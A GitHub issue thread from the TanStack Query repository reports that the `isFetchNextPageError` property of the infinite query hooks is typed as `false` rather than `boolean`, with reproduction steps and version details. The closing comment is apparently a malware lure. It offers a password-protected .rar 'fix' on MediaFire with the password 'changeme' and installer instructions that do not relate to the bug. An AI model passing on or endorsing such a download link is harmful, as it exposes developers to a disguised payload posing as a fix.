### ISSUE TITLE
Infinite queries type issue for `isFetchNextPageError`

### ISSUE THREAD

**Issue by ohanqo** [TanStack/query#7954]
### Describe the bug

The typing of the `isFetchNextPageError` property returned by the `useSuspenseInfiniteQuery` and `useInfiniteQuery` hooks is incorrect. It is currently typed as `false` instead of `boolean`.

### Your minimal, reproducible example

[CodeSandbox](https://codesandbox.io/p/sandbox/8zkzr6?layout=%257B%2522sidebarPanel%2522%253A%2522EXPLORER%2522%252C%2522rootPanelGroup%2522%253A%257B%2522direction%2522%253A%2522horizontal%2522%252C%2522contentType%2522%253A%2522UNKNOWN%2522%252C%2522type%2522%253A%2522PANEL_GROUP%2522%252C%2522id%2522%253A%2522ROOT_LAYOUT%2522%252C%2522panels%2522%253A%255B%257B%2522type%2522%253A%2522PANEL_GROUP%2522%252C%2522contentType%2522%253A%2522UNKNOWN%2522%252C%2522direction%2522%253A%2522vertical%2522%252C%2522id%2522%253A%2522cm0b7ufpg00063b6jccoxygus%2522%252C%2522sizes%2522%253A%255B100%252C0%255D%252C%2522panels%2522%253A%255B%257B%2522type%2522%253A%2522PANEL_GROUP%2522%252C%2522contentType%2522%253A%2522EDITOR%2522%252C%2522direction%2522%253A%2522horizontal%2522%252C%2522id%2522%253A%2522EDITOR%2522%252C%2522panels%2522%253A%255B%257B%2522type%2522%253A%2522PANEL%2522%252C%2522contentType%2522%253A%2522EDITOR%2522%252C%2522id%2522%253A%2522cm0b7ufpg00023b6jcjxpyxk8%2522%257D%255D%257D%252C%257B%2522type%2522%253A%2522PANEL_GROUP%2522%252C%2522contentType%2522%253A%2522SHELLS%2522%252C%2522direction%2522%253A%2522horizontal%2522%252C%2522id%2522%253A%2522SHELLS%2522%252C%2522panels%2522%253A%255B%257B%2522type%2522%253A%2522PANEL%2522%252C%2522contentType%2522%253A%2522SHELLS%2522%252C%2522id%2522%253A%2522cm0b7ufpg00033b6j709oa8le%2522%257D%255D%257D%255D%257D%252C%257B%2522type%2522%253A%2522PANEL_GROUP%2522%252C%2522contentType%2522%253A%2522DEVTOOLS%2522%252C%2522direction%2522%253A%2522vertical%2522%252C%2522id%2522%253A%2522DEVTOOLS%2522%252C%2522panels%2522%253A%255B%257B%2522type%2522%253A%2522PANEL%2522%252C%2522contentType%2522%253A%2522DEVTOOLS%2522%252C%2522id%2522%253A%2522cm0b7ufpg00053b6jraamlx4n%2522%257D%255D%257D%255D%252C%2522sizes%2522%253A%255B50%252C50%255D%257D%252C%2522tabbedPanels%2522%253A%257B%2522cm0b7ufpg00023b6jcjxpyxk8%2522%253A%257B%2522tabs%2522%253A%255B%257B%2522id%2522%253A%2522cm0b7ufpf00013b6jfc13njd6%2522%252C%2522mode%2522%253A%2522permanent%2522%252C%2522type%2522%253A%2522FILE%2522%252C%2522filepath%2522%253A%2522%252Fsrc%252Findex.tsx%2522%257D%255D%252C%2522id%2522%253A%2522cm0b7ufpg00023b6jcjxpyxk8%2522%252C%2522activeTabId%2522%253A%2522cm0b7ufpf00013b6jfc13njd6%2522%257D%252C%2522cm0b7ufpg00053b6jraamlx4n%2522%253A%257B%2522tabs%2522%253A%255B%257B%2522id%2522%253A%2522cm0b7ufpg00043b6jarchyxv1%2522%252C%2522mode%2522%253A%2522permanent%2522%252C%2522type%2522%253A%2522UNASSIGNED_PORT%2522%252C%2522port%2522%253A0%257D%255D%252C%2522id%2522%253A%2522cm0b7ufpg00053b6jraamlx4n%2522%252C%2522activeTabId%2522%253A%2522cm0b7ufpg00043b6jarchyxv1%2522%257D%252C%2522cm0b7ufpg00033b6j709oa8le%2522%253A%257B%2522tabs%2522%253A%255B%255D%252C%2522id%2522%253A%2522cm0b7ufpg00033b6j709oa8le%2522%257D%257D%252C%2522showDevtools%2522%253Atrue%252C%2522showShells%2522%253Afalse%252C%2522showSidebar%2522%253Atrue%252C%2522sidebarPanelSize%2522%253A15%257D)

### Steps to reproduce

1. Use `useSuspenseInfiniteQuery` or `useInfiniteQuery` 
2. Try to access the `isFetchNextPageError` property 
3. Observe that TypeScript always considers this property to be `false`.

### Expected behavior

`isFetchNextPageError` should be typed as `boolean`.

### How often does this bug happen?

Every time

### Platform

- OS: macOS (14.6.1)

### Tanstack Query adapter

None

### TanStack Query version

5.51.23

### TypeScript version

5.5.2

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
